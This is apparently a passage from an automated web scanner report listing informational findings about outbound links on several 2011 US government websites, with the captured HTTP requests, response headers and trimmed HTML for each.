Referer: http://nc.gov/1222,1222,Online_Services,Online_Services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 30 Apr 2011 00:49:01 GMT
X-Powered-By: ASP.NET
Content-Length: 16514
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASDQTAAR=ADICHPIBABAGCDEJAHFKEIPM; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
<html>
   <head>
       <meta name="GENERATOR" content="Microsoft Visual Studio 6.0" /
...[SNIP]...
<td colspan="2"><a onMouseOver="javascript:document.imgJDirectory.src='/images/Header/FocusHeadDirectory.jpg'" onMouseOut="javascript:document.imgJDirectory.src='/images/Header/UnselHeadDirectory.jpg'" href="http://www1.aoc.state.nc.us/juddir/employee/search/public/init.do"><img class="ImageBlock" title="Judicial Directory" height="25" alt="Judicial Directory" src="/images/Header/UnselHeadDirectory.jpg" width="129" border="0" name="imgJDirectory">
...[SNIP]...
<td width="151" valign="top" class="Menu"><a class="LeftMenu" href="http://www1.aoc.state.nc.us/www/calendars.html">Court Calendars</a>
...[SNIP]...
<td width="151" valign="top" class="Menu"><a class="LeftMenu" href="http://www1.aoc.state.nc.us/www/calendars/Criminal.html">Criminal Calendars</a>
...[SNIP]...
<td width="151" valign="top" class="Menu"><a class="LeftMenu" href="http://www1.aoc.state.nc.us/www/calendars/Civil.html">Civil Calendars</a>
...[SNIP]...

19.45. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhfishandgame.com
Path:   /cgi-bin/gl/outdoor.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/gl/outdoor.cgi?pg=AboutGL HTTP/1.1
Host: www.nhfishandgame.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=111112922.904209617.1304116995.1304116995.1304116995.1; __utmb=111112922; __utmc=111112922; __utmz=111112922.1304116995.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:43:58 GMT
Server: OutdoorCentralServer
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 18227


<html>
<head>
<title>GreatLodge.com :: Outdoor Central :: Active Outdoors</title>

<style type=text/css>
.button {font-weight:bold; color:#ffffff; background-color:#006600; border:#000000; border-
...[SNIP]...
</style>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<TD><A class=navLinks_child
onmouseover="document.id_licenses_spacer.src=dotarrow.src"
onmouseout="document.id_licenses_spacer.src=space.src"
href="https://id.outdoorcentral.us/">
Idaho</A>
...[SNIP]...
<TD><A class=navLinks_child
onmouseover="document.wa_licenses_spacer.src=dotarrow.src"
onmouseout="document.wa_licenses_spacer.src=space.src"
href="https://fishhunt.dfw.wa.gov/">
Washington</A>
...[SNIP]...
</span><A class=navLinks_child
onmouseover="document.wa_permits_spacer.src=dotarrow.src; popMsg('wa_permits',event,50,-50)"
onmouseout="document.wa_permits_spacer.src=space.src; popMsg('wa_permits')"
href="https://fishhunt.dfw.wa.gov/">
Washington</A>
...[SNIP]...
</span><A class=navLinks_child
onmouseover="document.wa_harvest_spacer.src=dotarrow.src; popMsg('wa_harvest',event,50,-50)"
onmouseout="document.wa_harvest_spacer.src=space.src; popMsg('wa_harvest')"
href="https://fishhunt.dfw.wa.gov/">
Washington</A>
...[SNIP]...
</span><A class=navLinks_child
onmouseover="document.wa_donation_spacer.src=dotarrow.src; popMsg('wa_donation',event,50,-50)"
onmouseout="document.wa_donation_spacer.src=space.src; popMsg('wa_donation')"
href="https://fishhunt.dfw.wa.gov/">
Washington</A>
...[SNIP]...

19.46. http://www.nist.gov/search-results.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nist.gov
Path:   /search-results.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search-results.cfm?q=xss.cx&btng=Search&num=10&sortType=L&scopeType=0&datefrom=&dateto= HTTP/1.1
Host: www.nist.gov
Proxy-Connection: keep-alive
Referer: http://www.nist.gov/srd/onlinelist.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:13 GMT
Server: Apache
Set-Cookie: CFID=17042990;path=/
Set-Cookie: CFTOKEN=54636047;path=/
Last-Modified: Tue, 4 Jan 2011 22:32:06 GMT
NIST: g3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 18308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Conte
...[SNIP]...
<li><a href="http://www.time.gov/">NIST Time</a>
...[SNIP]...
</a> /
   <a href="http://www.ExpectMore.gov">ExpectMore.gov (performance of federal programs)</a>
...[SNIP]...

19.47. https://www.nrsservicecenter.com/iApp/ret/content/landing.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/content/landing.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iApp/ret/content/landing.do?Role=None&Site=Ohio457 HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: http://oh.gov/stateemployee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:13 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: TLTSID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001PF1_bP7-IBZ42tEJzNaNTGe:13j9iuj6t; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483444304d6f4450416e34524c754261686f56624c74417a4e4d3251564d3742725258754d5173714a5651334c7449472f736b684a63426642327971723849794f733d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
</form>
<script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

19.48. http://www.nv.gov/NV_default4.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /NV_default4.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /NV_default4.aspx?id=345 HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=5ddcfda7-21c6-4f17-acf6-3568d114748f; expires=Mon, 30-Apr-2012 11:24:28 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 11:24:28 GMT; path=/
Set-Cookie: ASP.NET_SessionId=mzbc3255iwftyx2sfkbnli45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:29 GMT
Content-Length: 23621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<span><a class="FTahoma11" title="Nevada Legislature" href="http://leg.state.nv.us" target="_blank">Nevada Legislature</a>
...[SNIP]...
</span><a class="FTahoma11" title="Calendar of Meetings" href="http://leg.state.nv.us/MeetingDisplay/CalendarOfMeetings/" target="_blank">Calendar of Meetings</a>.... <a class="FTahoma11" title="Listen or View Meetings" href="http://leg.state.nv.us/MeetingDisplay/AudioVideo/" target="_blank">Listen or View Meetings</a>.... <a class="FTahoma11" title="Personalized Bill Tracking" href="https://www.leg.state.nv.us/Session/76th2011/Subscriber/" target="_blank"><br />
...[SNIP]...
<span class="FTahoma11"><a title="Nevada Electronic Legislative Information System..(NELIS)" href="https://nelis.leg.state.nv.us/" target="_blank">Nevada Electronic Legislative Information System..<span class="FTahoma11">
...[SNIP]...
</span><a title="Snow &amp; Ice Take It Slow" href="http://www.nevadadot.com/safety/winter/" target="_blank"><img title="Snow &amp; Ice Take It Slow" alt="Snow &amp; Ice Take It Slow" src="/assets/0/79/428/1f4ea1ba-4ca9-4ff3-92b8-e873fc2cb983.jpg" border="0" />
...[SNIP]...
<font face="Tahoma" size="1"><a title="Nevada NDOT" href="http://www.nevadadot.com" target="_blank">Nevada NDOT </a>
...[SNIP]...
<font size="1" face="Tahoma"><a title="Nevada DMV" href="http://www.dmvnv.com/" target="_blank">Nevada DMV </a>
...[SNIP]...
<p align="left"><a style="TEXT-DECORATION: none" href="http://gov.state.nv.us/"><font color="#000066" face="Arial" size="2">
...[SNIP]...
<p align="center"><a title="Governor Jim Gibbons" href="http://gov.state.nv.us" target="_blank"><img title="Govenor Brian Sandoval (sm)" alt="Govenor Brian Sandoval (sm)" src="/assets/0/4294967543/4294967544/8b542772-fe9d-48f8-8716-fd6e09fc9d8e.png" border="0" />
...[SNIP]...
<b><a style="TEXT-DECORATION: none" href="http://sos.state.nv.us/"><font color="#000066">
...[SNIP]...
<p align="center"><a title="Secretary of State Ross Miller" href="http://sos.state.nv.us" target="_blank"><img title="Secretary of State Ross Miller" alt="Secretary of State Ross Miller" src="/uploadedImages/nvgov_(state)/RossMiller.jpg" border="0" />
...[SNIP]...
<b><a style="TEXT-DECORATION: none" href="http://nevadatreasurer.gov/"><font color="#000066">
...[SNIP]...
<font color="#000066"><a href="http://nevadatreasurer.gov/"><span style="TEXT-DECORATION: none">
...[SNIP]...
<p align="center"><a title="Treasurer Kate Marshall" href="https://nevadatreasurer.gov/index.htm" target="_blank"><img width="120" height="119" title="Kate Marshall Nevada State Treasurer" style="WIDTH: 120px; HEIGHT: 119px" alt="Kate Marshall Nevada State Treasurer" src="/uploadedImages/nvgov_(state)/Images/Kate_
...[SNIP]...
<font color="#000066"><a style="TEXT-DECORATION: none" href="http://ag.state.nv.us/"><font color="#000066">
...[SNIP]...
<font color="#000066"><a style="TEXT-DECORATION: none" href="http://ag.state.nv.us/"><font color="#000066">
...[SNIP]...
<p align="center">....<a title="Attorney General Catherine Cortez Masto" href="http://ag.state.nv.us" target="_blank"><img title="Attorney General Catherine Cortez Masto" alt="Attorney General Catherine Cortez Masto" src="/uploadedImages/nvgov_(state)/2008-AG-CortezMasto.jpg" border="0" />
...[SNIP]...
</font><a href="http://ag.state.nv.us/about/contact/form.htm"><font color="#000080" style="FONT-SIZE: 9pt">
...[SNIP]...
<font color="#000042" size="1" face="Tahoma"><a title="click here for details" href="http://budget.state.nv.us/" target="_blank">Click here to view </a>
...[SNIP]...
<td><a href="http://energy.state.nv.us" title="Nevada Office of Energy">Nevada Office of Energy</a>
...[SNIP]...
<td><a href="http://renewableenergy.state.nv.us/" title="Nevada Renewable Energy">Nevada Renewable Energy</a>
...[SNIP]...
<td><a href="http://dem.state.nv.us" title="Emergency Management (DEM)">Emergency Management (DEM)</a>
...[SNIP]...
<td><a href="http://www.nv.ngb.army.mil/" title="Nevada National Guard">Nevada National Guard</a>
...[SNIP]...

19.49. http://www.nysegov.com/citGuide.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citGuide.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /citGuide.cfm?superCat=119&cat=411&content=main HTTP/1.1
Host: www.nysegov.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=101047966.1304117404.1.1.utmcsr=ny.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=101047966.182442221.1304117404.1304117404.1304117404.1; __utmc=101047966; __utmb=101047966.1.10.1304117404

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:49:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>
                   
                   <link rel="STYLESHEET" type
...[SNIP]...
<div style="height: 28px; background-color: #003366;border:#999 1px solid;width:754px;margin:0 auto; clear:both;text-align:center">
    <a href="http://www.ny.gov"><img style="float: left; border:none;" src="nysbannerpics/banner_img1.png" alt="NY.gov Portal" />
...[SNIP]...
<br />
   <a href="http://www.ny.gov/howdoi/index.html" onmouseup="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmousedown="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseover="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseout="quickChange(menuItem14a,'images/pg2slice_18a.gif')"><img id="menuItem14a" src="images/pg2slice_18a.gif" height="19" width="188" alt="How Do I?" border="0" />
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.nyhomes.org/index.aspx?page=332" title="Spanish version: Information about the State of New York Mortgage Agency's (SONYMA) Remodel New York program, which provides mortgage loans to low-and moderate-income people purchasing and renovating a home.">En Espa&ntilde;ol</a>
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.nyhomes.org/index.aspx?page=333" title="Spanish version: Link to information about SONYMA's Achieving the Dream Program and its requirements.">En Espa&ntilde;ol</a>
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.nyhomes.org/index.aspx?page=334" title="Spanish version: Information about the State of New York Mortgage Agency's Construction Incentive Program.">En Espa&ntilde;ol</a>
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.nyhomes.org/index.aspx?page=330" title="Spanish version: Links to information about the State of New York Mortgage Agency's (SONYMA) homeownership programs for low-and moderate-income people.">En Espa&ntilde;ol</a>
...[SNIP]...
<td align="right" colspan="2" class="bottomgrid" style="color:#DEDEDC" valign="bottom">
               <a href="http://www.ny.gov" title="NYS Home Page" style="text-decoration:none;"><img src="frameparts/nyshome.gif" alt="NYS Home Page" width="79" height="6" align="bottom" style="border:none;">
...[SNIP]...
</a>
               |
               <a href="http://www.ny.gov/contactus/index.html" title="Contact Us"><img src="frameparts/contactus.gif" alt="Contact Us" width="62" height="6" align="bottom" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/privacy/index.html" title="Privacy Policy"><img src="frameparts/privacypolicy.gif" width="79" height="6" align="bottom" alt="Privacy Policy" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/disclaimer/index.html" title="Disclaimer"><img src="frameparts/disclaimer.gif" width="57" height="6" alt="Disclaimer" align="bottom" style="border:none;">
...[SNIP]...

19.50. http://www.nysegov.com/citguide.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citguide.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /citguide.cfm?displaymode=normal&fontsize=100&contrast=lod&superCat=102&cat=449&content=main HTTP/1.1
Host: www.nysegov.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=101047966.1304117404.1.1.utmcsr=ny.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=101047966.182442221.1304117404.1304117404.1304117404.1; __utmc=101047966; __utmb=101047966.2.10.1304117404

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:50:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>
                   
                   <link rel="STYLESHEET" type
...[SNIP]...
<div style="height: 28px; background-color: #003366;border:#999 1px solid;width:754px;margin:0 auto; clear:both;text-align:center">
    <a href="http://www.ny.gov"><img style="float: left; border:none;" src="nysbannerpics/banner_img1.png" alt="NY.gov Portal" />
...[SNIP]...
<br />
   <a href="http://www.ny.gov/howdoi/index.html" onmouseup="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmousedown="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseover="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseout="quickChange(menuItem14a,'images/pg2slice_18a.gif')"><img id="menuItem14a" src="images/pg2slice_18a.gif" height="19" width="188" alt="How Do I?" border="0" />
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.consumer.state.ny.us/cpb_spanish_index.htm" title="Spanish version: Link to the NYS Consumer Protection Board.">En Espa&ntilde;ol</a>
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.omh.state.ny.us/omhweb/index_sp.html" title="Spanish version: Link to the NYS Office of Mental Health.">En Espa&ntilde;ol</a>
...[SNIP]...
</a>    
                               
                                   (<a href="http://www.cvb.state.ny.us/Espanol.aspx" title="Spanish version: Eligibility guidelines and allowable reimbursement expenses">En Espa&ntilde;ol</a>
...[SNIP]...
<td align="right" colspan="2" class="bottomgrid" style="color:#DEDEDC" valign="bottom">
               <a href="http://www.ny.gov" title="NYS Home Page" style="text-decoration:none;"><img src="frameparts/nyshome.gif" alt="NYS Home Page" width="79" height="6" align="bottom" style="border:none;">
...[SNIP]...
</a>
               |
               <a href="http://www.ny.gov/contactus/index.html" title="Contact Us"><img src="frameparts/contactus.gif" alt="Contact Us" width="62" height="6" align="bottom" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/privacy/index.html" title="Privacy Policy"><img src="frameparts/privacypolicy.gif" width="79" height="6" align="bottom" alt="Privacy Policy" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/disclaimer/index.html" title="Disclaimer"><img src="frameparts/disclaimer.gif" width="57" height="6" alt="Disclaimer" align="bottom" style="border:none;">
...[SNIP]...

19.51. https://www.paybill.com/Common/Left.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paybill.com
Path:   /Common/Left.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /Common/Left.asp?ID=205 HTTP/1.1
Host: www.paybill.com
Connection: keep-alive
Referer: https://www.paybill.com/payccu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:54:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 1594
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:53:43 GMT
Cache-control: no-cache


<HTML>
<HEAD>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
</HEAD>
</HTML>


<HTML>
<HEAD>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">

...[SNIP]...
<td width="135" align="center" valign="top"><script src=https://seal.verisign.com/getseal?host_name=www.paybill.com&size=M&use_flash=NO&use_transparent=NO&lang=en></script>
...[SNIP]...

19.52. https://www.scsignon.sc.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?CallbackUrl=https://www3.sctax.org/eSales/procLogon.asp&ApplicationSId=ESales HTTP/1.1
Host: www.scsignon.sc.gov
Connection: keep-alive
Referer: https://www3.sctax.org/esales/startReg.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; __utmb=46765221.2.10.1304123778

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Set-Cookie: ASP.NET_SessionId=ebd1ut55m4lu1x55fpv0xleo; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 01:06:55 GMT
Set-Cookie: TS958e6e=4cd4ad94e98f7572917d9abce2c0b8bffe6de3a44c3e21294dbb60b0; Path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 15349


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>DOR eSales Login</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

...[SNIP]...
<img height="20" alt="" src="/SCBOS.Core.Framework.Imaging.Resources.aspx?Type=StandardIcon&amp;Icon=spacer.gif&amp;CacheId=Spacer"
                                           width="7"> <a tabindex="105" onclick="showHelp('https://www3.sctax.org/esales/help/contactDOR.htm','_blank','500','450');return false;"
                                           class="NavigationLink" href="https://www3.sctax.org/esales/help/contactDOR.htm" target="_blank">

                                           Contact DOR</a>
...[SNIP]...

19.53. http://www.state.mn.us/portal/mn/jsp/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/home.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /portal/mn/jsp/home.do?agency=NorthStar HTTP/1.1
Host: www.state.mn.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:21 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadeldidhfggcfjkcenndfjgdgom.0:@@@@1803480290.1304161941@@@@; path=/portal
Content-Type: text/html;charset=utf-8
Content-Length: 35112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
   
   
<title>Minnesota North Star
...[SNIP]...
<link rel="stylesheet" href="http://www.state.mn.us/mn/css/main.css" type="text/css" id="main">


   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
</a> |
                       

<a href="http://www.mnaging.org/" class="whiteLink"><B>
...[SNIP]...
<center><a href="http://mn.gov/governor/"><img src="/mn/content_images/images/governor-dayton_northstar-ad.jpg" alt="To Gov. Dayton" hspace="10" border="0">
...[SNIP]...
<td><a href="https://www.bereadymn.com/">Weather Closure Info</a>
...[SNIP]...

19.54. https://www.tennesseeanytime.org/pmnout/notice/listByMonth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /pmnout/notice/listByMonth

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pmnout/notice/listByMonth?year=2011&month=4&day=29 HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s; __unam=53ea465-12fa3eacf85-221b441d-1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:07 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<li><a href="https://apps.tn.gov/hlrs/">Renew Health License</a>
...[SNIP]...
<li><a href="https://ui.tn.gov/">File Unemployment</a>
...[SNIP]...
<li><a href="https://apps.tn.gov/foil/">Search Felony Offenders</a>
...[SNIP]...
<li><a href="https://apps.tn.gov/parks/">State Parks Online Reservations</a>
...[SNIP]...
<li><a href="https://apps.tn.gov/bizreg/"> Business Tax Registration</a>
...[SNIP]...
<li><a href="https://apps.tn.gov/osbr/">One Stop Business Resource</a>
...[SNIP]...
<li><a href="https://www.k-12.state.tn.us/tcertinf/EducatorSearch.asp">Search Teacher Licensure</a>
...[SNIP]...
<li><a href="https://ui.tn.gov/">File or Certify for Benefits Online</a>
...[SNIP]...
